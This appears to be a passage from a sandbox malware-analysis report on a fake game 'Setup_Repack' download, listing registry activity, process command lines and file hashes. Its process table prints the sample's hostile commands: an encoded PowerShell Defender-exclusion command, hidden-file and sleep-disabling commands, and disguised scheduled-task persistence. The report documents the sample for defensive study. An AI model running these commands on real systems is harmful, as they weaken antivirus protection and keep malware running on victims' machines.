| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\MSTTSLocenUS.dat" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "1343" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "40C" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\Setup_Repack.zip.t2sbfdg.partial:Zone.Identifier | C:\Windows\system32\browser_broker.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
| Process | Command Line |
| C:\Windows\system32\LaunchWinApp.exe | "C:\Windows\system32\LaunchWinApp.exe" "https://feel-easy.games/catalog/counter-strike-go/" |
| C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca |
| C:\Windows\system32\browser_broker.exe | C:\Windows\system32\browser_broker.exe -Embedding |
| C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca |
| C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca |
| C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca |
| C:\Windows\system32\werfault.exe | werfault.exe /h /shared Global\8e2e508d1cdf4962b651ae1c84f59cf3 /t 0 /p 1396 |
| C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca |
| C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca |
| C:\Windows\System32\rundll32.exe | C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding |
| C:\Program Files\7-Zip\7zG.exe | "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\Setup_Repack\" -ad -an -ai#7zMap2531:228:7zEvent11327 |
| C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe | "C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe" |
| C:\Windows\system32\NOTEPAD.EXE | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\read me.txt |
| C:\Windows\system32\taskmgr.exe | "C:\Windows\system32\taskmgr.exe" /4 |
| C:\Users\Admin\AppData\Local\Temp\svchost.exe | "C:\Users\Admin\AppData\Local\Temp\svchost.exe" |
| C:\Users\Admin\AppData\Local\Temp\conhost.exe | "C:\Users\Admin\AppData\Local\Temp\conhost.exe" |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S" |
| C:\Windows\system32\mode.com | mode 65,10 |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e file.zip -p1432210452150682449214609890 -oextracted |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_8.zip -oextracted |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_7.zip -oextracted |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_6.zip -oextracted |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_5.zip -oextracted |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_4.zip -oextracted |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_3.zip -oextracted |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_2.zip -oextracted |
| C:\Users\Admin\AppData\Local\Temp\main\7z.exe | 7z.exe e extracted/file_1.zip -oextracted |
| C:\Windows\system32\attrib.exe | attrib +H "Installer.exe" |
| C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | "Installer.exe" |
| C:\Windows\SysWOW64\cmd.exe | "cmd.exe" /C powershell -EncodedCommand "PAAjADMATAAxAEMAaAB4ADUATAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUATwA4AFIAdwBXAEwARQAyAEMAUgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBqAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQA1ADAAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -EncodedCommand "PAAjADMATAAxAEMAaAB4ADUATAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUATwA4AFIAdwBXAEwARQAyAEMAUgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBqAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQA1ADAAIwA+AA==" |
| C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe | C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe |
| C:\Windows\SysWOW64\powercfg.exe | powercfg /x -hibernate-timeout-ac 0 |
| C:\Windows\SysWOW64\powercfg.exe | powercfg /x -hibernate-timeout-dc 0 |
| C:\Windows\SysWOW64\powercfg.exe | powercfg /x -standby-timeout-ac 0 |
| C:\Windows\SysWOW64\powercfg.exe | powercfg /x -standby-timeout-dc 0 |
| C:\Windows\SysWOW64\powercfg.exe | powercfg /hibernate off |
| C:\Windows\SysWOW64\cmd.exe | "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
| C:\Windows\SysWOW64\cmd.exe | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4901" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
| C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4901" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
| C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
Network
Files
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
| MD5 | aa62f8ce77e072c8160c71b5df3099b0 |
| SHA1 | 06b8c07db93694a3fe73a4276283fabb0e20ac38 |
| SHA256 | 3eb4927c4d9097dc924fcde21b56d01d5d1ef61b7d22bfb6786e3b546b33e176 |
| SHA512 | 71724e837286c5f0eb2ee4ad01ac0304d4c7597bb2d46169c342821b0da04d8597491bd27ef80e817bc77031cd29d2182ccc82ef8ea3860696875f89427c8e0a |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
| MD5 | d8f51942e7e89da58b435c93c47ba81e |
| SHA1 | 23d682857a51a95a0af48677b5d68bd48266634b |
| SHA256 | fb2afa8902c94c130e8646740fab5b150e851fcc2ef127953147b348c2af1084 |
| SHA512 | afccc652cfd22ff8af5bb74646c2d0ca06738a8b0cc6893b796cb56b2023c1e5e4497173ac51b718fa04d8a2956072b8177f59be135166d480b5177ace2de200 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 10f885ff672ee1dbafa85e43fa5e54d3 |
| SHA1 | c8ee6fd3aea24185acbb405c0f8845388da44b14 |
| SHA256 | 71e7c73d8c418630f3eba268669372a42ab0fc09e0c7888dd7a6fa36380afcf6 |
| SHA512 | 6a5fbc54c89f25b2bde951cd6c7c6d868472d8a300b055ca6b80d6a53df0a8aa439e5b45d99fe11878de8e1262422e226a45be2b780e84768e8859e3f19bc4be |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 06c5b5c0c789dd216c19a7dfa8481c50 |
| SHA1 | 1773561f5c21c65459046fe5ecb42cb6ee32b96f |
| SHA256 | db2e42296bc2d231306c3820778759ae063de2c73982d5afad3111a513fcec99 |
| SHA512 | f5e24dd7340c00fd80e778c1f9386a004f097e0e004df26500f6235a6a2a93902a593c781523ce4a3745c85725977f664675ea099b86030d0a39e9f423bf0d76 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\492V7EW6\consent_modules[1].json
| MD5 | 141c344b390f38964b1e8e84206da7f9 |
| SHA1 | 8eb0523392702d57ba6afdcc8e8dcef4dd41e6da |
| SHA256 | 2eeb2ccf57a0916fd2569df9378e348e1d5a7c64897d904921624e0bc017f157 |
| SHA512 | 99d64fb77c431b3c487b865c84ea8acbf90a1e8af48dace21f4548c6edb8588ded175e22eb81e9140c4db67d402fea27c62047ad0ee5e7bf70454432c3908601 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LA8JCWVO\gtm[1].js
| MD5 | 5724438604a928aea04503b51e152c98 |
| SHA1 | 7b142c949d2650b3910d3db67bed29ee57fce1bc |
| SHA256 | c4a250d46fcdac49076b8ca055289e1c02e2c001e1cd4d2d24b0455e7230f035 |
| SHA512 | c8235733902254764a1a8e8f94354113094dd2ed1339d2158a7d98d55ab2be269fe4d3034c75cde5c058e5b231a588af49f69efe43606a18bad5f3f1a847800c |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62
| MD5 | 2b07260a5f5f488bfbb6b572e6e7b2f0 |
| SHA1 | 773be858219621420c3787f7c1819dd4026bb1d1 |
| SHA256 | 458cc60be36b72d3d3efbafb01145b867f396968895a960306d4e4aadc327b08 |
| SHA512 | 83ac9b3648111790ff221c15a743610d6f8e150e66766df2d07165367dc4a0a2ccea9717eccc40e213eff64df22f181ed94da47f4f52f9afc8a5bf5ddd6a4dc3 |
memory/2024-448-0x0000014541520000-0x0000014541540000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894
| MD5 | 95efd9a933107190a60c1b1347a902f6 |
| SHA1 | 729f1f47c373a73393149b5bd73ed785f6d4e0b6 |
| SHA256 | b1b1b32949c8cf6323bf7c04acf47be28fc25dbf87e1da2fe3f6325bd079fecb |
| SHA512 | fb61c457ad0268f159de2510405ce86011d0c9050efd6182c7dc136947e347cf3f4095abba97db26b1065c36efbbdf73722ff4f0af311c11d47d71cda9fa9a1c |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894
| MD5 | 3f5f6fb05f32199083f1330f44712bf8 |
| SHA1 | e8c5fc82aefb6785e09c16e351c5d2455648ad35 |
| SHA256 | 21d75b560dc96d421b60746e9e6e14857f7e7d1632225b6c5e217bc8afbbeb85 |
| SHA512 | b707f3cf683a0495fa446f4985d4ddafe9f714e709392098ab97e030daa1e6caaf72383c94b6d2335389e18d59da1ee6888ff32082f5d2699b7197d666db6a53 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62
| MD5 | 5fac28a99405aacf9ba85640187906eb |
| SHA1 | 8c32c013c1292a667d920621e8fcc74b105609cd |
| SHA256 | 9a952b8a3adc1b5fde1fabced0ddbc2d4d9afcd16c04df692d86e2acfdd97827 |
| SHA512 | 99a38ba28ea4f79b9705764c288f1a755a19e3c816f135ab2741f2a412304ea985e7de875050b7cb9cc18db49661eccf3c81c0c3bb03fe4421bc12400505d5d1 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LA8JCWVO\invisible[1].js
| MD5 | 819806b945f92500aa67c6ca32c12c59 |
| SHA1 | 440a14ee8b60260aac309e85030e5357c13ef7da |
| SHA256 | 9c2da4864e11341529bc016a6099d9ea78ab1a240bae50bdfa83ff16c3738080 |
| SHA512 | fe1a5932b99facee9a01dccf8fa630198260b2cb82c9a17d1bc5341a494013b40f59939350e2201282e8fbd6443b05a05ce5bb41ed307961f113a7cb3773d395 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\492V7EW6\icons_sprite[1].svg
| MD5 | 78ba220259933f24dc696a3b1e085444 |
| SHA1 | 39c72d416a8564f5c2d9cfee8c9ddd17cea17807 |
| SHA256 | 7ba1bc2084def769e77a7dbf97cd91d68fe6c6d55b5d183a7d36630da8da2b02 |
| SHA512 | b7622af8523d9a31ba20aa960745e2a6df4d1583b940a94c8380cf1d802abfbfb1f183927dd457280f8f9477afcf670ba17b80eb8f03884a867638f251ac2525 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\492V7EW6\footerIcons[1].png
| MD5 | e0abc4fea89d2c5153b73cd02ac5ba13 |
| SHA1 | 00465ef774805c82fb5b8a40b743f7b1a1d1a7d6 |
| SHA256 | f917a9105c311331b1d40f4d2bdbf11233c1c465616c1a9c46232f451463b061 |
| SHA512 | 202aa7f925729cd1fe7f7e66b4217d90cd05b5fb8dde0b3991461f88afa11c1744a3f56974296ec155733669db44d96b6a84593a76f2e5be9c63016e3150f04c |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LA8JCWVO\arrow_dropdown[1].svg
| MD5 | 34bd6069c9f08bb444c86b8d099a000e |
| SHA1 | f78f72953d6f9f639d26f4e38c1d822b52e86763 |
| SHA256 | 82b94716473aa225e715e117802145c5d2d725aa1ba9d476d61a5d3da16a8c26 |
| SHA512 | 5762d0ce880f5150a5adb0395f3eb2a2f177091fa3f033e768cab09d7e8d149f6bd98cf081f3a84ec63b92491bbe580977e4c784972157aee94282824b29930a |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\XR06EITC\www.mediafire[1].xml
| MD5 | c1ddea3ef6bbef3e7060a1a9ad89e4c5 |
| SHA1 | 35e3224fcbd3e1af306f2b6a2c6bbea9b0867966 |
| SHA256 | b71e4d17274636b97179ba2d97c742735b6510eb54f22893d3a2daff2ceb28db |
| SHA512 | 6be8cec7c862afae5b37aa32dc5bb45912881a3276606da41bf808a4ef92c318b355e616bf45a257b995520d72b7c08752c0be445dceade5cf79f73480910fed |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\rating-icon[1].svg
| MD5 | bda8eea9a141d6fa4c5cabfb85d0c6f2 |
| SHA1 | d980ec6a93a847a6e76ed6ca8d682df8f0301ce7 |
| SHA256 | 10f0f9961cf0eb4ab927e2264b0670fffd4c63d4fa33b4e14fa8f624624ae9ac |
| SHA512 | 16fd2cec8c6ce6e0a27644feac7b67da1ac74638d36a07f260c9ea79e2e487a95a6f359c3223d9fa1c0bddd4df9115c85b0432937a40ad88c637fcc2c137638f |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\gta[1].webp
| MD5 | ccd96aef0799ae26f9140b086443ceb5 |
| SHA1 | 07ae045c64311fdb759bc3ccc7b0cee417517159 |
| SHA256 | 1b6f1893b4474255554c2d55ee75966516e728b52bd544652044f034ed30dad7 |
| SHA512 | f1531b7a87030c1decc590b04b4be0253420d49bb0a8e6a45b81a6ecf7fbb52cd74b351e51dc3654a1c08f539eac50e24b25f897f10aa42a3e79805a7bdf309f |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\download[1].js
| MD5 | 6e5abb646c9f663a705450ed7ec94abf |
| SHA1 | 590508ad804c91eae3628f3dcbf200a7f97120b1 |
| SHA256 | ef14be22b55923775f583f9066956d6d6f881dbad86c30e83bd115de6b42bd71 |
| SHA512 | 77b5af8c5dbd1af09a3fa1fb16001d306e626a4537937d2dc1822236c52525a75bfb94fdbe4331b5783b68942f811d5224955a1082940e8c44bd3e783d9563e4 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\uikit[1].js
| MD5 | 1c5586bcfed406eef44392f436e1f504 |
| SHA1 | 5cd5ae3d315d61124fe3e6adc39d253feba94110 |
| SHA256 | bac90afa9256f84da25a865ec31f8da8b94e959f5012019caaecfdfed9ddbf29 |
| SHA512 | 74670fd352db52a3877c37a960250322099cbf9d2859dfa4f797258a59fc7876944924617c9dc2d4347b6f83bf802187bf7a9b4041fdbf52e315ce9725023cde |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\amongus[1].webp
| MD5 | 461ae896a934a3c9ee377e768f0b0330 |
| SHA1 | fed6a23939807733f482cf88a9e63a56016038c6 |
| SHA256 | fe1e17b5c52a3c3a3430fcfa326eef4e1d288cb2247ed81fdb94260fd6e85032 |
| SHA512 | e5b3cd7c7951f8525b4faf1732b426dd8dafb0bd20708cc6c9ee351d533a4c084f782005a32008e4f816d5e4f6bb9d455624a3dd40a38c8938a696be1ca27b56 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\genshin[1].webp
| MD5 | 2d6619b8d9134d4de33bf0a96e481c8d |
| SHA1 | 6c6c999ff99d68b739f18ec216a657fd0dc34e51 |
| SHA256 | 4474b25438af8c31a07c12cfd4f872a785725fd97c0577299faa30cef797f9a0 |
| SHA512 | d7548aba1e8a0caa0e266f128c38015db4c49e3b396265c082481f72818c23c5e301411077b959be5b391d3a7665e8bae9b9550cd3116ac3d32200cb86118666 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\1[1].jpg
| MD5 | 9e117bb43d85cbd4b01219c46d9fdd95 |
| SHA1 | 8450de5c5e83672903c7c14551dfe5e068fea369 |
| SHA256 | 0d5e600ca8ab34a3722bfc03c4c189099a8042950679a3b64ad21ddeb713a63c |
| SHA512 | e1edec0d61fff3e292be92d94153b6f0f0ff0c21fa54cfbb0d0199c89ebc6eeaa55727bdfbec435dc1ad6eba6f5af7cd55b1bd1721ba19cafed16a58861e5c52 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\csgo[1].webp
| MD5 | 9abefd16e28dd1b78a1afec43f1aa6f8 |
| SHA1 | a5eacc857b40c0820d2d841cef1028e18dd3af95 |
| SHA256 | 0b55866538e0ba839f743565094b13003a5f0c2e6fd9f117373c1495238bb64e |
| SHA512 | 6ea0a2bd4be9a06df54660107bcd5aa40d176f593119b101983cc60e8f8b816a0e0e7e1b7bb5e21ba01c232a739cde5ecd5d68d0fae44f8195889ea35aef55ae |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\game-logo[1].png
| MD5 | 6b4e477cbf962d21b39f62566c293927 |
| SHA1 | dabacb45d430836db0b1f9b3115a8b5890ca4406 |
| SHA256 | 779e9c1757e0c00a8f572b596f9176e00916e3200209772c5aa74f9384a10ade |
| SHA512 | b0574aa74866c1d26c07f99ef8a25c7ab46078c8a30e08a28edda0412933de66c5a77b77d7bdfa075badac27896be4016d793ad69d1d54d49d1c5044a4931698 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\style[1].css
| MD5 | ed168d673cc60dcdaebcf60bed63b5ab |
| SHA1 | 5a20887a74381a5315ba8b88ebe3a3ef98549aaf |
| SHA256 | fbd12f9eef2b590b2f5df6805f5ba95c20cd7e4c65cb59cb77d5153b4fbcc7b2 |
| SHA512 | 095b3c0b3c5e987cac166cbcadc038604f38f8ef6750c4944aa5ec750db4c7d5d647723cf359c54d1dbbe1592f40c8e34084f426f5d0a3c69d2984dc8ddaf4a3 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\492V7EW6\Sansation_Light[1].woff2
| MD5 | 03b45ef5f2e0c8d7272789c37168e6bf |
| SHA1 | 441a70675cc4e5e2b0da9402d2ff97984dace1c8 |
| SHA256 | aca749e481974cbe03fbea30d904bd6f16dfaa507d6ee47bab6a5a3cef196790 |
| SHA512 | 9ca6d54813c866c486fc539690844fb3ddd4f7d1ae70ba307adc0abcaa6d92b506c4539cd0f72761a4485e76add85a4c98f624605704cc53811f9b0bee33a3ee |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\492V7EW6\Sansation_Regular[1].woff2
| MD5 | 13885f2bc47772fd72e76a6e4d4a5d22 |
| SHA1 | 7117261bad7c9ded3eb05eeed944ac4a353e2718 |
| SHA256 | c80832b44a2fd95c623d48077fef3cb75d620a94a1f4060809fd8f600a69d29b |
| SHA512 | 7b6eb5ab6baa7c0c1823b3624e23407b26e08a1075666b1b0ba5544db1ab52e85e6fc9e06dcc1c8aa7821a5953c49943b7a1dd9c836911723b6c8c4fff270b0a |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\492V7EW6\Sansation_Bold[1].woff2
| MD5 | 5da25f726c0485450defdc18283a65e9 |
| SHA1 | 7856843b367ea6221e679f431275cc2194eaa475 |
